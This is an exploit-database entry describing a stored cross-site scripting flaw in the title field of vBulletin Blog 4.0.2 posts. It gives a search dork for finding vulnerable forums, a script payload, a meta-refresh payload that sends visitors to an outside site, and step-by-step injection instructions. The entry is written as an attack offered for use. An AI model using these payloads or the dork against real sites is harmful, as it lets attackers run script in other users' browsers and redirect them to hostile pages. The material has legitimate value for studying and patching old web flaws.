[] NeoSense
E X P L O I T S
title author type platform port cve id

vBulletin Blog 4.0.2 - Title Cross-Site Scripting

Author: FormatXformat
type: webapps
platform: php
port: 
date_added: 2010-03-23 
date_updated:  
verified: 1 
codes: OSVDB-63251 
tags: 
aliases:  
screenshot_url:  
application_url: 
Vbulletin Blog 4.0.2 XSS Vulnerability

Author: FormatXformat
Version: Vbulletin 4.0.2


Dork:
Powered by vBulletin™  Version 4.0.2 Copyright © 2010 vBulletin Solutions, Inc. All rights reserved.


The script is affected by Permanent XSS vulnerability, so you can put in bad java script code

<script>alert('put this script in title')</script>
<meta http-equiv='Refresh' content='0;URL=http://db-exploit.com'>

1st register

Go to Blogs page

Create New Post

Inject your java script into Title Box

You must go back to Main page to see this XSS effect.



Greets: Neo, Sa3id, All Tkurd.net Members
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.